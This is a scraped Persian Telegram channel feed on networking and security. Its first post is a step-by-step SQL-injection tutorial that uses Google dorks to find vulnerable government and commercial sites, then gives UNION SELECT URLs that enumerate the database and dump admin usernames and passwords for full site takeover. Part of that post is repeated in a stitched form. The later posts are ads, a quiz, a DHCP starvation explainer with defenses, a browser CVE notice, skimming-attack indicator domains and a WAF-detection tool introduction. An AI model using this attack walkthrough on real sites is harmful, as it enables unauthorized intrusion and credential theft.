🔹خب چی گفتم؟ اطلاعات لاگین ادمین ها 🙄🦷 وقت دندون تیز کردنه ؛ چرا که با بدست آوردن اطلاعات لاگین ادمین در واقع مدیریت کل سایت رو بدست میگیریم و همه چی تمومه😁...
📌خب بریم سراغ اصل مطلب یا همون پیاده سازیش😎
1️⃣مرحله اول پیاده سازی اینه که پیدا کنیم چه سایتهایی این آسیب پذیری رو دارن؟!
🔹ما میتونیم با کمک دورک نویسی این سایتهارو پیدا کنیم[اگه نمیدونی دورک چیه تو پستهای قبلی توضیحش دادم حتما بخون]؛ چندتا دورک پیشنهادی براتون مینویسم ولی در نهایت خودتون هم میتونید با سرچ کردن دورک های اماده ی مخصوص این اسیب پذیری رو پیدا کنید و تو طیف گسترده تری جستجوتون رو انجام بدین👌🏼🔎
🔻
us
site:.gov.uk inurl:id
site:.gov.us inurl:id
🔻german
site:.gov.de inurl:id
🔻chin
site:.gov.cn inurl:id
🔹مثلا تو موارد بالا میایم گاورمنت هایی که مربوط به امریکا و یا المان و یا چین هستن و توی url شون کلمه id وجود داره رو جستجو میکنیم(وجود کلمه ایدی میتونه یکی از نشونه های این آسیب پذیری باشه)🔹اگه دنبال گاورمنت ها نیستید میتونید پسوند های دیگه ای رو جستجو کنید برای مثال شرکت های تجاری (.com) یا بیزینس ها (.biz) یا شرکت های اطلاع رسانی (.info) و غیره رو برای کشورهای مختلف دیگه ای خارج از موارد بالا مثل کانادا (.ca) یا امارات (.ae) یا کلمبیا (.co) و ... استفاده کنید.
2️⃣تو مرحله دوم باید صفحات وبسایت مورد نظر رو تست کنیم که ببینیم کدوم صفحه باگ رو داره.
برای اینکار باید url اش رو دستکاری کنیم که اینکار خودش دوتا روش داره :
روش اول -> قرار دادن سینگل کوتیشن اخر ادرس سایت ؛ مثل:
example.com/?page_id=16'در این حالت اگه سایت لود بشه که یعنی آسیب پذیر نیست ولی اگه آسیب پذیر باشه شمارو به صفحه ای با ادرس warning:mysqlfetcharray() منتقل کرد یعنی حاوی آسیب پذیریه و میتونیم کارمونو شروع کنیم 😎
و روش دوم -> استفاده از کلمه اند؛ مثل :
example.com/?page_id=16+and+1=0در این حالت سایت باید ناقص لود بشه و یا لود نشه تا متوجه بشیم آسیب پذیره، در غیر اینصورت آسیب پذیر نیست.
مابقی مراحل رو تو پست بعدی دنبال کنید 👀👇🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥8👍3
3️⃣خب بعد از اینکه تارگتمون رو پیدا کردیم، تو مرحله سوم میخوایم تعداد ستونهای جدول های دیتابیس رو پیدا کنیم که با دستور order by انجام میگیره، که به شکل زیر استفاده میشه :
تو اینجا دو تا عدد وجود داره عدد ۹۹۹ تعداد جدولهاست که ما اون رو ماکسیمم ترین حالت در نظر میگیریم تا کد بتونه اجرا بشه و عدد ۵ تعداد ستون ها ؛ ما باید تعداد ستونهارو از یه عدد بزرگ شروع کنیم و در صورت دریافت خطا متوجه بشیم که تعداد ستونها کمتره و انقدر پیش بریم و عدد رو کوچیک کنیم و تست کنیم تا دیگه خطا دریافت نکنیم و در واقع تعداد ستونها رو بدست بیاریم 🙂✔️
4️⃣ تو مرحله قبل تعداد کلی ستون هارو بدست اوردیم اما الان میخوایم تعداد ستون های آسیب پذیر رو به کمک دستور union select بدست بیاریم؛ به این صورت که :
خروجی این کد به شما اعدادی رو نشون میده مثل ۱-۲-۴ که نشون دهندهٔ ستون های آسیب پذیره.
5️⃣ تو گام پنجم میریم سراغ مهم ترین مسئله یا همون بیرون کشیدن جدول ادمین 👩🏼💻که از طریق information_schema انجام میشه.
خب به چه صورت؟!
اسم هایی که معمولا روی جدول ادمین قرار داده میشن موارد زیر هستن :
User,users,admin,login,username,usr,_user,tbladmin,tbluser,tblusers
6️⃣ خب خب ، نوبیتم باشه نوبت فراخوانی جدول ادمین با کمک دستور where هست؛
7️⃣در گام نهایی باید اطلاعات لاگین رو از جدول ادمین استخراج کنیم که به این شکل انجام میشه:
اگه نکتهی تکمیل کننده یا موردی هست کامنت کنید...
👤 Drwcsi
💎 Channel: @DevelopixNetwork
http://example.com/test.php?id=-999+order+by+5--تو اینجا دو تا عدد وجود داره عدد ۹۹۹ تعداد جدولهاست که ما اون رو ماکسیمم ترین حالت در نظر میگیریم تا کد بتونه اجرا بشه و عدد ۵ تعداد ستون ها ؛ ما باید تعداد ستونهارو از یه عدد بزرگ شروع کنیم و در صورت دریافت خطا متوجه بشیم که تعداد ستونها کمتره و انقدر پیش بریم و عدد رو کوچیک کنیم و تست کنیم تا دیگه خطا دریافت نکنیم و در واقع تعداد ستونها رو بدست بیاریم 🙂✔️
4️⃣ تو مرحله قبل تعداد کلی ستون هارو بدست اوردیم اما الان میخوایم تعداد ستون های آسیب پذیر رو به کمک دستور union select بدست بیاریم؛ به این صورت که :
http://example.com/test.php?id=5+union+select+1+2+3+4+5--
در واقع وقتی فهمیدیم جدولمون ۵ ستون داره ، جلوی آیدی ۵ رو قرار دادیم و به تعداد ستون هاش در اخر url عدد اضافه کردیم تا بتونیم از بین این ۵ ستون، ستونهای آسیب پذیر رو پیدا بکنیم. خروجی این کد به شما اعدادی رو نشون میده مثل ۱-۲-۴ که نشون دهندهٔ ستون های آسیب پذیره.
5️⃣ تو گام پنجم میریم سراغ مهم ترین مسئله یا همون بیرون کشیدن جدول ادمین 👩🏼💻که از طریق information_schema انجام میشه.
خب به چه صورت؟!
http://www.example.com/test.php?id=5+union+select+1,group_concat(table_name),3
,4,5+from+information_schema.tables--
خب اینجا گفتیم بیاد و جدولهای دیتابیس رو که به کمک group concat مرتب و گروه بندی شده رو بهمون نمایش بده ؛ که اون هم بچه حرف گوش کنیه 🦻🏼 و بهمون اسم جدول هارو نمایش میده. خب حالا وقتشه که از بین جدولها دنبال جدول ادمین بگردیم 👀😅اسم هایی که معمولا روی جدول ادمین قرار داده میشن موارد زیر هستن :
User,users,admin,login,username,usr,_user,tbladmin,tbluser,tblusers
6️⃣ خب خب ، نوبیتم باشه نوبت فراخوانی جدول ادمین با کمک دستور where هست؛
www.example.com/test.php?id=5+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='admin'
حالا اطلاعات داخل جدول ادمین نمایش داده میشه .7️⃣در گام نهایی باید اطلاعات لاگین رو از جدول ادمین استخراج کنیم که به این شکل انجام میشه:
www.example.com/test.php?id=5+union+select+1,2,group_concat(username,0x3a,password),4,5+from+admin
الان اطلاعات لاگین به شکل admin:Act3ey67c به نمایش در میان و شما تونستید رمز ورود به پنل ادمین سایت رو بدست بیارید 💪🏼😅 و الان به تمام سایت دسترسی دارین :)😎💜اگه نکتهی تکمیل کننده یا موردی هست کامنت کنید...
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥7👍3
Forwarded from Zi. Ta
https://www.instagram.com/reel/Cud-Z5StHG4/?igshid=MmU2YjMzNjRlOQ==
🔹️ اگر در عنوان های زیر مشغول به کار هستید ،یا میخواهید در این زمینه ها پیشرفت کنید ، این پیج درحال برگزاری دوره و آموزش های بسیار خوبی هست که خیلی به دردتون میخوره :
🔺️مدیران شبکه، زیرساخت و لینوکس
🔺️ متخصصان مانیتورینگ
🔺️ متخصصان DevOps
🔺️ متخصصان تحلیل داده
🔹️ اگر در عنوان های زیر مشغول به کار هستید ،یا میخواهید در این زمینه ها پیشرفت کنید ، این پیج درحال برگزاری دوره و آموزش های بسیار خوبی هست که خیلی به دردتون میخوره :
🔺️مدیران شبکه، زیرساخت و لینوکس
🔺️ متخصصان مانیتورینگ
🔺️ متخصصان DevOps
🔺️ متخصصان تحلیل داده
👍2
Forwarded from Developix Support
📌 اگر دنبال تبدیل شدن به یک برنامهنویس مطرح در دنیای فریلنسری و کسب درآمد بیشتر هستی، شرکت در این کارگاه رو از دست نده!
💻 کارگاه تجارت بینالمللی برای برنامهنویسها؛
(فریلنسرینگ حرفهای در مقیاس جهانی)
🗓 زمان: 30 شهریور تا 6 مهر 1402
حضوری و آنلاین (2 جلسه حضوری و 5 جلسۀ آنلاین)
📝 اطلاعات بیشتر و ثبتنام
🔻و یا برای کسب اطلاعات بیشتر کافیه به آیدی ما پیام بدی!
🆔 @MaktabSharif_Admin
🌐 وبسایت |📱کانال تلگرام | 📲 اینستاگرام
💻 کارگاه تجارت بینالمللی برای برنامهنویسها؛
(فریلنسرینگ حرفهای در مقیاس جهانی)
🗓 زمان: 30 شهریور تا 6 مهر 1402
حضوری و آنلاین (2 جلسه حضوری و 5 جلسۀ آنلاین)
📝 اطلاعات بیشتر و ثبتنام
🔻و یا برای کسب اطلاعات بیشتر کافیه به آیدی ما پیام بدی!
🆔 @MaktabSharif_Admin
🌐 وبسایت |📱کانال تلگرام | 📲 اینستاگرام
👎3
Forwarded from کار و کسب، عادل طالبی 📌
This media is not supported in your browser
VIEW IN TELEGRAM
📌 دوره آنلاین سئو برای مدیران، آخرین روز ثبتنام با تخفیف ویژه
🔘 استراتژی سئو
🔘 مدیریت فرآیندهای سئو
🔘 گزارشات سئو
🔘 ارزیابی و نظارت بر فرآیندهای سئو
🔘 اشتباهات سئو
🔘 قراردادهای سئو
این دوره پس از سه سال مجدداً برگزار میشود. در این دوره یاد میگیرید چگونه فرآیندهای سئو را مدیریت کنید. این دوره برای مدیران و صاحبان کسب و کارها مفید است که بدانند از تیم سئو چه بخواهند و چگونه از اجرای صحیح فرایندهای سئو اطمینان یابند. همچنین متخصصین سئو یاد میگیرند چگونه با کارفرمایان به شکل درست تعامل و همکاری کرده، به نیازهای آنها پاسخ صحیح بدهند.
پنج جلسه آموزش انلاین فشرده و تخصصی همراه با یک جلسه پرسش و پاسخ.
اطلاعات بیشتر و ثبتنام در ایسمینار:
🌐 eseminar.tv/wb116105
کد تخفیف: talebi
فقط امروز و فردا، به جای 5 میلیون تومان فقط با 2 میلیون تومان در این دوره آنلاین شرکت کنید.
هدایای شرکت در دوره:
🔘 حداقل 2 میلیون تومان رپورتاژ در تریبون
🔘 اکانت 6 ماهه جتسئو به ارزش 1.200.000 تومان
🔘 اکانت یک سالۀ سازمانی میزیتو به ارزش 2.900.000 تومان
🔘 یک جلد کتاب سئو 2022+2023 امضاء شده.
❌❌ فقط امروز ❌❌
☑️ @kar_kasb
🔘 استراتژی سئو
🔘 مدیریت فرآیندهای سئو
🔘 گزارشات سئو
🔘 ارزیابی و نظارت بر فرآیندهای سئو
🔘 اشتباهات سئو
🔘 قراردادهای سئو
این دوره پس از سه سال مجدداً برگزار میشود. در این دوره یاد میگیرید چگونه فرآیندهای سئو را مدیریت کنید. این دوره برای مدیران و صاحبان کسب و کارها مفید است که بدانند از تیم سئو چه بخواهند و چگونه از اجرای صحیح فرایندهای سئو اطمینان یابند. همچنین متخصصین سئو یاد میگیرند چگونه با کارفرمایان به شکل درست تعامل و همکاری کرده، به نیازهای آنها پاسخ صحیح بدهند.
پنج جلسه آموزش انلاین فشرده و تخصصی همراه با یک جلسه پرسش و پاسخ.
اطلاعات بیشتر و ثبتنام در ایسمینار:
🌐 eseminar.tv/wb116105
کد تخفیف: talebi
فقط امروز و فردا، به جای 5 میلیون تومان فقط با 2 میلیون تومان در این دوره آنلاین شرکت کنید.
هدایای شرکت در دوره:
🔘 حداقل 2 میلیون تومان رپورتاژ در تریبون
🔘 اکانت 6 ماهه جتسئو به ارزش 1.200.000 تومان
🔘 اکانت یک سالۀ سازمانی میزیتو به ارزش 2.900.000 تومان
🔘 یک جلد کتاب سئو 2022+2023 امضاء شده.
❌❌ فقط امروز ❌❌
☑️ @kar_kasb
Forwarded from Developix Support
This media is not supported in your browser
VIEW IN TELEGRAM
دایناسورها در حال خرید در تهران 🤯
⚡️هیچوقت فکرشو میکردی که همچین تصویری رو ببینی؟
⚡️از آینده به تو سلام 😁
💠این تصویر با استفاده از یک ابزار جدید در تلگرام ساخته شده که هر متنی بهش بدی رو تبدیل به عکس میکنه!
همینالان بهش پبام بده تا عکسش رو برات بفرسته😇
فقط کافیه بزنی رو آیدی زیر و شروع کنی 😉👇🏻
@aiolearn_artbot
🌀هوشمصنوعی با پیشرفت فوقالعادش داره همه دنیار رو فرا میگیره 😉🤯
⚡️هیچوقت فکرشو میکردی که همچین تصویری رو ببینی؟
⚡️از آینده به تو سلام 😁
💠این تصویر با استفاده از یک ابزار جدید در تلگرام ساخته شده که هر متنی بهش بدی رو تبدیل به عکس میکنه!
همینالان بهش پبام بده تا عکسش رو برات بفرسته😇
فقط کافیه بزنی رو آیدی زیر و شروع کنی 😉👇🏻
@aiolearn_artbot
🌀هوشمصنوعی با پیشرفت فوقالعادش داره همه دنیار رو فرا میگیره 😉🤯
👎11
...... برای جلوگیری از Loop لایه ۳ و ...... برای جلوگیری از Loop لایه ۲ می باشد. (از چپ به راست)
Anonymous Quiz
28%
Loopback - STP
43%
TTL - STP
17%
RSTP - PVSTP
11%
VLAN - Broadcast Storm
👍10🔥5
💒 دورا رو یادتونه؟! حالا قراره با کمک دورا بریم یه اتک بزنیم 😅
🔸 همونطور که میدونید هر دستگاهی که میخواد به اینترنت متصل بشه نیاز به آیپی داره، که ما گاهاً دستی اختصاصش میدیم و اکثر مواقع مخصوصاً در شبکههای بزرگ از DHCP که بطور اتومات فرآیند آیپی دهی رو انجام میده کمک میگیریم.
🔹 حالا دورا تو شبکه چیه؟
- فرآیند آیپی دهی توسط DHCP چهار مرحله داره که به اونها DORA گفته میشه، که مخفف Discovery , Offer , Request و Acknowledgement هستش.
— که بریم دونه دونه توضیحشون بدیم 😅
🔸 دیسکاوری چیه؟! اول ماجرا کلاینت یه بسته رو به کل شبکه میفرسته (برادکست میکنه) و میگه DHCP Server کیه؟! بیاد آیپی منو بده 😂😭
🔹 حالا آفر چیه؟ اینجاست که بستهای که برادکست شده و به همه ارسال شده یه نسخش میرسه دست DHCP Server و اونم میخواد اعلام کنه که بستت به دستم رسید و فهمیدم که آیپی میخوای. پس یه آیپی رو از تو Pool اش یا مخزن آیپیهاش برمیداره و برای این کلاینت رزرو میکنه و در جواب بسته دیسکاوری، بسته آفر رو با محتویاتِ: آیپیای که میخواد بهش پیشنهاد بده، مک کلاینت، مدت زمان رزرو آیپی، دیفالت گیت وی و دیاناس و سایر اطلاعات مورد نیاز کلاینت ارسال میکنه.
🔸 بستهی بعدی ریکوئسته که کلاینت میگه من این آیپیای که بهم پیشنهاد دادی توی آفر رو پسندیدم😅 و میخوامش. بهم اختصاص بده...
🔹 بستهی بعدی اکنالج هستش که تو این مرحله فرآیند آیپی دهی نهایی میشه و مواردی که تو مرحله آفر پیشنهاد داده بود رو نهایی میکنه و به کلاینت اختصاص میده.
🔸 خب میرسیم به جای جذابش که حالا ما چطوری از طریق دورا اتک میزنیم؟! 😎
- در اینجا اتکر میاد مک آدرس جعلی تولید میکنه و با هر کدوم از مکها یه بستهی دیسکاوری میفرسته و میگه به من آیپی بده، DHCP Server هم از Pool اش یا مخزن آیپیش دونه دونه آیپیهارو به مکهای جعلی اختصاص میده تا اینکه مخزنش خالی میشه و دیگه نمیتونه به دستگاههای واقعی شبکه آیپی اختصاص بده و اینجوری ارتباط کل دستگاههای موجود تو شبکه با همدیگه قطع میشه :)
- به این حمله DHCP Starvation گفته میشه. که در واقع مخزنمون خالی شده و گرسنش شده 🍔
🔹 حالا شاید سوال پیش بیاد راه حل جلوگیری ازش چیه؟!
- اگر درخواست آیپی با یک مکآدرس ثابت بود، باید با استفاده از تکنولوژی DHCP Snooping فیلتر MAC Address Check رو فعال کرد که در این حالت مکآدرس رو از هدر بسته میخونه و اگه تو زمان مشخص درخواست زیادی داد دراپش میکنه.
ولی اگه درخواست آیپی با مکهای مختلف اتفاق بیفته دیگه این راه حل جواب نمیده و میتونیم از یه مرحله قبل جلوشو بگیریم و Port Security رو فعال کنیم و بگیم فقط فلان مکآدرس امکان ارسال پکت از فلان پورت رو داره. و اینجوری اصلاً دستگاه دیگهای نمیتونه درخواست دیسکاوری بفرسته چه برسه که بخواد دریافت بشه و مکش چک بشه!
- و به همین راحتی مشکل حل میشه 😅
امیدوارم از این پست خوشتون اومده باشه 💜🧸
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔸 همونطور که میدونید هر دستگاهی که میخواد به اینترنت متصل بشه نیاز به آیپی داره، که ما گاهاً دستی اختصاصش میدیم و اکثر مواقع مخصوصاً در شبکههای بزرگ از DHCP که بطور اتومات فرآیند آیپی دهی رو انجام میده کمک میگیریم.
🔹 حالا دورا تو شبکه چیه؟
- فرآیند آیپی دهی توسط DHCP چهار مرحله داره که به اونها DORA گفته میشه، که مخفف Discovery , Offer , Request و Acknowledgement هستش.
— که بریم دونه دونه توضیحشون بدیم 😅
🔸 دیسکاوری چیه؟! اول ماجرا کلاینت یه بسته رو به کل شبکه میفرسته (برادکست میکنه) و میگه DHCP Server کیه؟! بیاد آیپی منو بده 😂😭
🔹 حالا آفر چیه؟ اینجاست که بستهای که برادکست شده و به همه ارسال شده یه نسخش میرسه دست DHCP Server و اونم میخواد اعلام کنه که بستت به دستم رسید و فهمیدم که آیپی میخوای. پس یه آیپی رو از تو Pool اش یا مخزن آیپیهاش برمیداره و برای این کلاینت رزرو میکنه و در جواب بسته دیسکاوری، بسته آفر رو با محتویاتِ: آیپیای که میخواد بهش پیشنهاد بده، مک کلاینت، مدت زمان رزرو آیپی، دیفالت گیت وی و دیاناس و سایر اطلاعات مورد نیاز کلاینت ارسال میکنه.
🔸 بستهی بعدی ریکوئسته که کلاینت میگه من این آیپیای که بهم پیشنهاد دادی توی آفر رو پسندیدم😅 و میخوامش. بهم اختصاص بده...
🔹 بستهی بعدی اکنالج هستش که تو این مرحله فرآیند آیپی دهی نهایی میشه و مواردی که تو مرحله آفر پیشنهاد داده بود رو نهایی میکنه و به کلاینت اختصاص میده.
🔸 خب میرسیم به جای جذابش که حالا ما چطوری از طریق دورا اتک میزنیم؟! 😎
- در اینجا اتکر میاد مک آدرس جعلی تولید میکنه و با هر کدوم از مکها یه بستهی دیسکاوری میفرسته و میگه به من آیپی بده، DHCP Server هم از Pool اش یا مخزن آیپیش دونه دونه آیپیهارو به مکهای جعلی اختصاص میده تا اینکه مخزنش خالی میشه و دیگه نمیتونه به دستگاههای واقعی شبکه آیپی اختصاص بده و اینجوری ارتباط کل دستگاههای موجود تو شبکه با همدیگه قطع میشه :)
- به این حمله DHCP Starvation گفته میشه. که در واقع مخزنمون خالی شده و گرسنش شده 🍔
🔹 حالا شاید سوال پیش بیاد راه حل جلوگیری ازش چیه؟!
- اگر درخواست آیپی با یک مکآدرس ثابت بود، باید با استفاده از تکنولوژی DHCP Snooping فیلتر MAC Address Check رو فعال کرد که در این حالت مکآدرس رو از هدر بسته میخونه و اگه تو زمان مشخص درخواست زیادی داد دراپش میکنه.
ولی اگه درخواست آیپی با مکهای مختلف اتفاق بیفته دیگه این راه حل جواب نمیده و میتونیم از یه مرحله قبل جلوشو بگیریم و Port Security رو فعال کنیم و بگیم فقط فلان مکآدرس امکان ارسال پکت از فلان پورت رو داره. و اینجوری اصلاً دستگاه دیگهای نمیتونه درخواست دیسکاوری بفرسته چه برسه که بخواد دریافت بشه و مکش چک بشه!
- و به همین راحتی مشکل حل میشه 😅
امیدوارم از این پست خوشتون اومده باشه 💜🧸
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍13🔥8❤2👎2
همین حالا Browser خودتونو آپدیت کنید⚠️
مرورگر های Edge-Chrome-Opera-Firefox-Brave آپدیتی رو برای بستن آسیب پذیری CVE-2023-4863 ارائه کردند.‼️
این آسیب پذیری، از طریق WebP که یک فرمت معروف برای رندر کردن تصاویر است امکان فعال شدن دارد و نه تنها خود Browser، بلکه ممکن است اپلیکیشن های نصب شده روی دستگاه رو هم تحت تاثیر قرار دهد.💀
به نظر میرسد تلگرام هم تحت تاثیر این قضیه قرار گرفته و آپدیتی رو اخیرا Release کرده.💣
#Security #CVE
👤 Drwcsi
💎 Channel: @DevelopixNetwork
مرورگر های Edge-Chrome-Opera-Firefox-Brave آپدیتی رو برای بستن آسیب پذیری CVE-2023-4863 ارائه کردند.‼️
این آسیب پذیری، از طریق WebP که یک فرمت معروف برای رندر کردن تصاویر است امکان فعال شدن دارد و نه تنها خود Browser، بلکه ممکن است اپلیکیشن های نصب شده روی دستگاه رو هم تحت تاثیر قرار دهد.💀
به نظر میرسد تلگرام هم تحت تاثیر این قضیه قرار گرفته و آپدیتی رو اخیرا Release کرده.💣
#Security #CVE
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍19👎1🔥1
🌀 حمله Skimming attack چیست؟ 🌀
🔸 در این حمله کدهای جاوااسکریپت آلوده به یک وب سایت تزریق میشوند تا بتوانند فرمهای html که کاربران در آنها دیتاها و اطلاعات احراز هویتی و مالی خود را وارد میکنند به سرقت ببرند. به تازگی یک متد جدید و غیر قابل تشخیص برای این نوع حمله ایجاد شده است به این صورت که کدهای javanoscript آلوده در قالب خطای 404 خود را مخفی می کنند. و زمانی که کاربر در حال پر کردن فیلدهای کارت اعتباری خود میباشد این کدهای آلوده شروع به سرقت آنها و ارسال آنها به سرور های C2 خود مینمایند. اگر در ترافیک شبکه خود یکی از دامنههای زیر را مشاهده کردید وبسایت شما به این نوع بدافزار آلوده شده است.
🔗 Pmdresearch com
🔗 secures-tool com
🔗 adsometric com
🔗 cngresearch com
👤 MHReza
💎 Channel: @DevelopixNetwork
🔸 در این حمله کدهای جاوااسکریپت آلوده به یک وب سایت تزریق میشوند تا بتوانند فرمهای html که کاربران در آنها دیتاها و اطلاعات احراز هویتی و مالی خود را وارد میکنند به سرقت ببرند. به تازگی یک متد جدید و غیر قابل تشخیص برای این نوع حمله ایجاد شده است به این صورت که کدهای javanoscript آلوده در قالب خطای 404 خود را مخفی می کنند. و زمانی که کاربر در حال پر کردن فیلدهای کارت اعتباری خود میباشد این کدهای آلوده شروع به سرقت آنها و ارسال آنها به سرور های C2 خود مینمایند. اگر در ترافیک شبکه خود یکی از دامنههای زیر را مشاهده کردید وبسایت شما به این نوع بدافزار آلوده شده است.
🔗 Pmdresearch com
🔗 secures-tool com
🔗 adsometric com
🔗 cngresearch com
👤 MHReza
💎 Channel: @DevelopixNetwork
👍13🔥2
🌀 معرفی ابزار wafw00f 🌀
🔸 فایروالهای وب اپلیکیشنها (WAFs) ابزارهای مهمی برای حفاظت از برنامههای وب در برابر انواع تهدیدات مختلف مانند حملات XSS، حملات SQL injection و سایر اشکال مخرب هستند. این ابزارها با تجزیه و تحلیل ترافیک ورودی به یک برنامه وب عمل میکنند و درخواستهایی که به نظر میرسد مخرب هستند را مسدود یا تغییر میدهند.
🔹یک ابزار که میتواند برای شناسایی حضور یک فایروال برنامه وب (WAF) استفاده شود، wafw00f است. wafw00f یک اسکریپت پایتون است که میتواند در شناسایی نوع WAF ای که یک برنامه وب را حفاظت میکند، استفاده شود.
🔗 لینک گیتهاب این ابزار
👤 MHReza
💎 Channel: @DevelopixNetwork
🔸 فایروالهای وب اپلیکیشنها (WAFs) ابزارهای مهمی برای حفاظت از برنامههای وب در برابر انواع تهدیدات مختلف مانند حملات XSS، حملات SQL injection و سایر اشکال مخرب هستند. این ابزارها با تجزیه و تحلیل ترافیک ورودی به یک برنامه وب عمل میکنند و درخواستهایی که به نظر میرسد مخرب هستند را مسدود یا تغییر میدهند.
🔹یک ابزار که میتواند برای شناسایی حضور یک فایروال برنامه وب (WAF) استفاده شود، wafw00f است. wafw00f یک اسکریپت پایتون است که میتواند در شناسایی نوع WAF ای که یک برنامه وب را حفاظت میکند، استفاده شود.
🔗 لینک گیتهاب این ابزار
👤 MHReza
💎 Channel: @DevelopixNetwork
👍6👎2